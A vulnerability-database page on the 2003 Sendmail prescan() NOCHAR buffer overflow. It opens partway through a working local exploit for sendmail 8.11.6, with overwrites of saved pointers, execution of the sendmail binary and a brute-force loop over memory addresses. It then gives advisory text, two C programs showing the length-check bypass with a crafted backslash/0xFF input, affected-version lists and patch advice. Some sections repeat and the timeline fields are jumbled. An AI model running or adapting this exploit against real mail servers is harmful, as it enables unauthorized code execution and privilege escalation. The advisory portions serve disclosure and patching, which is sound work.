	*ptr2 = target.zero;
	
	
        /* set bufp */
        ptr2 = (int*) &egg[target.ebp+target.bufp-target.pvpbuf];
	*ptr2 = target.chunk;
	
	/* set ret ebp + 4 */
	ptr2 = (int*) &egg[target.ebp+4-target.pvpbuf];
	*ptr2 = target.ret;
	
	
		        
		

	/* execute program */
	pid = fork();
	if(pid == -1) {
		perror("fork()");
		exit(-1);
	}
	
	/* child */
	if(pid==0) {
		execve(target.sendmail,arg,NULL);
		perror("execve()");
		kill(getpid(),SIGKILL);
		exit(0);
	}
	else {
		int status;
		wait(&status);
		
		if(WIFEXITED(status) == 0)
			return 0;
		return 1;
	}
}


/* 
 * OK here is how we brute force.
 * We need to find two values... a valid chunk to free (our fake chunk)
 * and the pvpbuf addr
 * Since our fake chunk is repeated all over and is 4*5 bytes long,
 * we have 5 possibilities of error in a sequential search. We try for:
 * chunk,chunk+4,chunk+8,chunk+12,chunk+16
 *
 * pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else
 * the exploit will fail since we cannot overwrite bufp. We start from bruteforcing ebp + target.bufp
 * decreasing by 4 bytes
 *
 */
void bruteforce(struct target_info target) {
	int cincrease = 0;	/* how many times we increased chunk value */
	target.pvpbuf = target.ebp+target.bufp;

	printf("Trying pvpbuf=0x%x\n",target.pvpbuf);

	while(target.ebp - target.pvpbuf < 2000) {	/* exploit will fail since pvpbuf < 2000 bytes */
		if(exploit(target)) {
			printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk);
			return;
		}
		
		/* make sure it is a "usable" address ... start with a base of 0x0a since you have space until 0xfe */
		target.chunk+=4;
		cincrease++;
		if(cincrease > 4) {
			target.chunk -= cincrease*4;	/* start at initial value again */
			cincrease =0;
			target.pvpbuf -= 4;
			printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
		}
	}
	
	printf("Bruteforce failed\n");
}

void print_targets() {
	int tcount = sizeof(targets)/sizeof(struct target_info);
	int i;
	
	printf("Id\tDescription\tpvpbuf\t\tzero\t\tchunk\t\tshellcode addr\n");
	
	for(i = 0; i < tcount; i++) {
		printf("%d)\t%s\t0x%x\t0x%x\t0x%x\t0x%x\n",i,
			targets[i].description,targets[i].pvpbuf,targets[i].zero,targets[i].chunk,targets[i].ret);
	}
	
}

void usage(char *p) {
	printf("Usage: %s <opts>\n",p);
	printf("-h\tthis lame message\n");
	printf("-t\ttarget\n");
	printf("-b\tbrute force\n");
	printf("\n");
	print_targets();
	exit(0);
}

int main(int argc, char *argv[]) {
	int t = 0;
	int brute = 1;
	int opt;

	printf("Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)\n");

	while( (opt = getopt(argc,argv,"t:bh")) != -1) {
		switch(opt) {
			case 't':
				t = atoi(optarg);
				if(t >= sizeof(targets)/sizeof(struct target_info)) {
					printf("Invalid target %d\n",t);
					exit(0);
				}
				brute = 0;
				break;
				
			case 'b':
				brute = 1;
				break;
				

			case 'h':
			default:
				usage(argv[0]);
		}
	}
	
	printf("Attempting to exploit %s\n",targets[t].description);
	if(brute) {
		bruteforce(targets[t]);
		exit(0);
	}

	printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf);
	printf("zero=\t\t0x%x\n",targets[t].zero);
	printf("chunk=\t\t0x%x\n",targets[t].chunk);
	printf("shellcode=\t0x%x\n",targets[t].ret);

	t = exploit(targets[t]);
	if(t)
		printf("Exploit successfull\n");
	else
		printf("Exploit failed... try adding -b\n");

	exit(0);
}
		

- Vulnerability information

8294
Sendmail NOCHAR Control Value prescan Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Sendmail. Due to a vulnerable char to int conversion it is possible to use the NOCHAR control value to bypass the length check done by the prescan function resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.
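The char-to-int confusion described above, as an added illustration that is not part of this database entry or of Sendmail's own source: a cut-down model of the prescan() lookahead loop, in which a quoted backslash is written back without a bound check and the length check (with its few bytes of slack) only runs when the following character is stored. Reading that character through a signed char turns the input byte 0xff into -1, the same value as the NOCHAR sentinel, so the store and its check are skipped; masking the byte to its unsigned value before the comparison, the conversion fix the advisory text refers to, restores the check. PVPSIZE, BACKING and the helper names are assumptions, and the toy writes into oversized backing storage so it reports the overrun instead of corrupting memory.

```c
#include <stdio.h>
#include <stdlib.h>

#define NOCHAR   (-1)           /* "no lookahead character" sentinel, as in sendmail's prescan() */
#define PVPSIZE  32             /* assumed nominal size of the token buffer (sendmail: pvpsize) */
#define BACKING  (PVPSIZE * 8)  /* real storage behind the nominal limit: the demo never writes past it */

/*
 * Cut-down model of the prescan() lookahead loop.
 *   masked == 0: the unfixed read, `c = *p++` through a signed char, so the input
 *                byte 0xff becomes -1 and is indistinguishable from NOCHAR.
 *   masked == 1: the corrected read, `c = (*p++ & 0x00ff)`, keeping c in 0..255.
 * Returns the number of bytes stored, or -1 when the address is rejected as too long.
 * *overrun receives how many bytes landed beyond the nominal PVPSIZE limit.
 */
int scan_address(const char *addr, int masked, char *out, int *overrun)
{
    const signed char *p = (const signed char *)addr; /* signed char, as on x86 builds */
    char *q = out;
    int c = NOCHAR;
    int bslashmode = 0;

    *overrun = 0;
    for (;;) {
        /* store away any old lookahead character: the only place the length check lives */
        if (c != NOCHAR && !bslashmode) {
            if (q >= &out[PVPSIZE - 5])
                return -1;                    /* "553 Address too long" */
            *q++ = (char)c;
        }

        /* read a new input character */
        c = masked ? (*p++ & 0x00ff) : *p++;
        if (c == '\0')
            break;

        if (bslashmode) {
            bslashmode = 0;
            if (c != '!') {
                /* the backslash itself is written back with no length check; the check
                 * is expected to run on the next pass, when the quoted character is stored */
                if (q >= &out[BACKING - 1])
                    break;                    /* demo-only hard stop, not part of the modelled logic */
                *q++ = '\\';
                continue;                     /* if c == NOCHAR here, the next pass stores nothing */
            }
        }
        if (c == '\\')
            bslashmode = 1;
    }
    *q = '\0';
    if (q - out > PVPSIZE)
        *overrun = (int)(q - out) - PVPSIZE;
    return (int)(q - out);
}

/* Scan an ordinary address; returns the stored length or -1. */
int scan_plain(const char *addr, int masked)
{
    char out[BACKING + 1];
    int overrun;
    return scan_address(addr, masked, out, &overrun);
}

/* Scan `pairs` repetitions of the two-byte sequence backslash, 0xff (constructed input).
 * overrun may be NULL when the caller only wants the stored count. */
int scan_quoted_pairs(int pairs, int masked, int *overrun)
{
    char out[BACKING + 1];
    char *in = malloc(2 * (size_t)pairs + 1);
    int i, n, local;
    for (i = 0; i < pairs; i++) {
        in[2 * i] = '\\';
        in[2 * i + 1] = (char)0xff;
    }
    in[2 * pairs] = '\0';
    n = scan_address(in, masked, out, &local);
    free(in);
    if (overrun)
        *overrun = local;
    return n;
}

int overrun_for_pairs(int pairs, int masked)
{
    int overrun;
    scan_quoted_pairs(pairs, masked, &overrun);
    return overrun;
}

int main(void)
{
    int overrun;
    printf("plain address, unmasked: %d bytes stored\n", scan_plain("user@example.com", 0));
    printf("40 pairs, unmasked:      %d bytes stored", scan_quoted_pairs(40, 0, &overrun));
    printf(", %d past the %d-byte limit (check bypassed)\n", overrun, PVPSIZE);
    printf("40 pairs, masked:        %d (rejected as too long)\n", scan_quoted_pairs(40, 1, &overrun));
    return 0;
}
```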

- Timeline

2003-03-29 2003-03-18
2003-03-29 Unknown

- Solution

Upgrade to version 8.12.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Sendmail Address Prescan Memory Corruption Vulnerability
Boundary Condition Error 7230
Yes Yes
2003-03-29 12:00:00 2007-09-21 11:40:00
Discovery credited to Michal Zalewski.

- Affected software versions

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 9_x86 Update 2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun LX50
Sun Linux 5.0
+ Sun LX50
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ 550 4100R
Sun Cobalt Qube3 4000WG
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 3.0.2
Sendmail Inc Sendmail Switch 3.0.1
Sendmail Inc Sendmail Switch 3.0
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.2.4
Sendmail Inc Sendmail Switch 2.2.3
Sendmail Inc Sendmail Switch 2.2.2
Sendmail Inc Sendmail Switch 2.2.1
Sendmail Inc Sendmail Switch 2.2
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail Switch 2.1.4
Sendmail Inc Sendmail Switch 2.1.3
Sendmail Inc Sendmail Switch 2.1.2
Sendmail Inc Sendmail Switch 2.1.1
Sendmail Inc Sendmail Switch 2.1
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 3.0.2
Sendmail Inc Sendmail for NT 3.0.1
Sendmail Inc Sendmail for NT 3.0
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Inc Sendmail for NT 2.6.1
Sendmail Inc Sendmail for NT 2.6
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Sendmail Consortium Sendmail 8.12.7
+ OpenPKG OpenPKG 1.2
+ Slackware Linux 8.1
+ SOTLinux SOTLinux 2003 Desktop
+ SOTLinux SOTLinux 2003 Server
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
SCO OpenLinux Workstation 3.1.1
SCO OpenLinux Server 3.1.1
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
IBM z/OS V1R4
IBM z/OS V1R2
IBM z/OS
IBM OS/390 V2R9
IBM OS/390 V2R8
IBM OS/390 V2R6
IBM OS/390 V2R10
IBM MVS
IBM AIX 5.1 L
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.2
IBM AIX 5.1
HP Tru64 5.1 a PK4 (BL21)
HP NonStop-UX Whitney
HP NonStop-UX PUMA
HP MPE/iX 7.5
HP MPE/iX 7.0
HP MPE/iX 6.5
HP MPE/iX 6.0
HP Internet Express 6.0
HP Internet Express 5.9
HP Internet Express 5.8
HP Internet Express 5.7
HP Internet Express 5.4
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.34
HP HP-UX 10.30
HP HP-UX 10.26
HP HP-UX 10.24
HP HP-UX 10.20 SIS
HP HP-UX 10.20 Series 800
HP HP-UX 10.20 Series 700
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.9
HP HP-UX 10.8
HP HP-UX 10.1 0
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
HP AltaVista Firewall Raptor EC
HP AltaVista Firewall AVFW98
HP AlphaServer SC
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 f
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Compaq Tru64 4.0 d PK9 (BL17)
Compaq Tru64 4.0 d
Compaq Tru64 4.0 b
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2

- Not Affected Versions

SGI IRIX 6.5.20
Apple Mac OS X Server 10.2.5
Apple Mac OS X 10.2.5

- Discussion

A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This condition has been confirmed to be exploitable by remote attackers to execute instructions on target systems. The vulnerability stems from a logic error in the conversion of a char to an integer value: an input byte read through a signed char can compare equal to the parser's NOCHAR sentinel, so the length check that guards the output buffer is not applied to it. The issue has been fixed in Sendmail 8.12.9.
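The following is an added example, not sendmail's parseaddr.c (which this page does not reproduce) and not the exploits referenced below. It is a stripped-down model of the tokenizer loop built from the mechanism stated in the description and discussion above: an int variable holds the NOCHAR sentinel (-1), the only length check sits in front of the "store previous character" write and is skipped when the pending character is NOCHAR, and a backslash-escape path emits a byte without that check. The loop shape, the function names prescan_model, build_payload, run_scenario and benign_check, the buffer limit and the "\" 0xFF payload are assumptions chosen to make the failure observable; the masking of each input byte to 0..255 in the hardened variant mirrors the style of fix described for 8.12.9.

```c
#include <stdio.h>
#include <string.h>

/* Sentinel meaning "no character pending" (value as described on this page). */
#define NOCHAR (-1)

/*
 * Simplified model of the address tokenizer (hypothetical reconstruction,
 * not sendmail's code).
 *   addr     NUL-terminated input address
 *   limit    logical size of the output buffer; the length check fires at
 *            limit - 5, leaving slack for a terminator and delimiters
 *   out      destination; must really be larger than limit so that an
 *            over-run is observable here instead of corrupting memory
 *   hardened nonzero masks each input byte to 0..255 before it is compared
 *            with NOCHAR (the style of the 8.12.9 fix)
 * Returns bytes written to out, or -1 when "address too long" fired.
 */
int prescan_model(const char *addr, int limit, char *out, int hardened)
{
    const char *p = addr;
    char *q = out;
    int c = NOCHAR;            /* int so that it can hold the sentinel */
    int bslashmode = 0;

    for (;;) {
        /* Store the previous character. This is the only place the length
         * check runs, and it is skipped whenever c == NOCHAR. */
        if (c != NOCHAR && !bslashmode) {
            if (q >= out + limit - 5)
                return -1;     /* "553 5.1.0 Address too long" */
            *q++ = (char)c;
        }

        /* Read the next input byte. The vulnerable form goes through a signed
         * char (forced here, since plain char signedness is implementation-
         * defined), so the byte 0xFF becomes -1, which equals NOCHAR. */
        if (hardened)
            c = (unsigned char)*p;          /* 0xFF -> 255, never NOCHAR */
        else
            c = *(const signed char *)p;    /* 0xFF -> -1 == NOCHAR */
        p++;

        if (c == '\0')
            break;

        if (bslashmode) {
            /* Escape path: the backslash is written here with no length
             * check; the escaped byte is meant to be stored by the guarded
             * code at the top of the loop, unless it was misread as NOCHAR. */
            bslashmode = 0;
            if (c != '!') {
                *q++ = '\\';
                continue;
            }
        }
        if (c == '\\')
            bslashmode = 1;
    }
    *q = '\0';
    return (int)(q - out);
}

/* Constructed sample input: `pairs` copies of "\" followed by 0xFF,
 * NUL-terminated; dst needs 2*pairs + 1 bytes. */
void build_payload(char *dst, int pairs)
{
    int i;
    for (i = 0; i < pairs; i++) {
        dst[2 * i] = '\\';
        dst[2 * i + 1] = (char)0xFF;
    }
    dst[2 * pairs] = '\0';
}

/* Run the 80-byte payload against a logical 16-byte buffer. */
int run_scenario(int hardened)
{
    char payload[128], out[256];
    build_payload(payload, 40);
    return prescan_model(payload, 16, out, hardened);
}

/* Returns 1 if an ordinary address passes through the model unchanged. */
int benign_check(void)
{
    char out[256];
    int n = prescan_model("user@example.org", 64, out, 0);
    return n == 16 && strcmp(out, "user@example.org") == 0;
}

int main(void)
{
    printf("vulnerable: wrote %d bytes past a 16-byte limit without a check\n",
           run_scenario(0));
    printf("hardened:   %s\n", run_scenario(1) < 0 ? "address too long" : "accepted");
    printf("benign:     %s\n", benign_check() ? "unchanged" : "mangled");
    return 0;
}
```

Each "\" 0xFF pair costs the attacker two input bytes and advances the output pointer by one: the backslash is written on the unchecked escape path, and the 0xFF byte, now equal to NOCHAR, is never handed to the guarded store where the length check lives. In the hardened variant the same byte reads as 255, reaches the guarded store, and the check returns "address too long" once the limit is hit. The model forces a signed read so it behaves the same on every platform; whether plain char is signed is implementation-defined, which is one reason the impact of a bug like this varies by platform and compiler.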

- Exploit

The following local exploit for sendmail 8.11.6 was provided by sorbo (sorbox@yahoo.com).

A new exploit has been released by 127 Research and is available from the following location:

http://www.7f.no-ip.com/

- Solution

Please see the referenced advisories for more information.


Sun Solaris 8_sparc

IBM z/OS V1R4
  • IBM PQ72696


Sun Solaris 7.0

HP HP-UX B.11.11

HP HP-UX B.11.00

Apple Mac OS X Server 10.2

Apple Mac OS X 10.2

Apple Mac OS X 10.2.1

Apple Mac OS X Server 10.2.2

Apple Mac OS X 10.2.3

Apple Mac OS X Server 10.2.3

Apple Mac OS X 10.2.4

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.22

Compaq Tru64 4.0 f PK7 (BL18)

Compaq Tru64 5.1 PK6 (BL20)

SGI IRIX 6.5.16

SGI IRIX 6.5.18

SGI IRIX 6.5.19

HP MPE/iX 7.5

Sendmail Consortium Sendmail 8.10

Sendmail Consortium Sendmail 8.10.1

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.2

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.5

Sendmail Consortium Sendmail 8.12 beta12

Sendmail Consortium Sendmail 8.12 beta5

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.7

Sendmail Consortium Sendmail 8.12.8

Sendmail Consortium Sendmail 8.9 .0

Sendmail Consortium Sendmail 8.9.2

Sendmail Consortium Sendmail 8.9.3

- References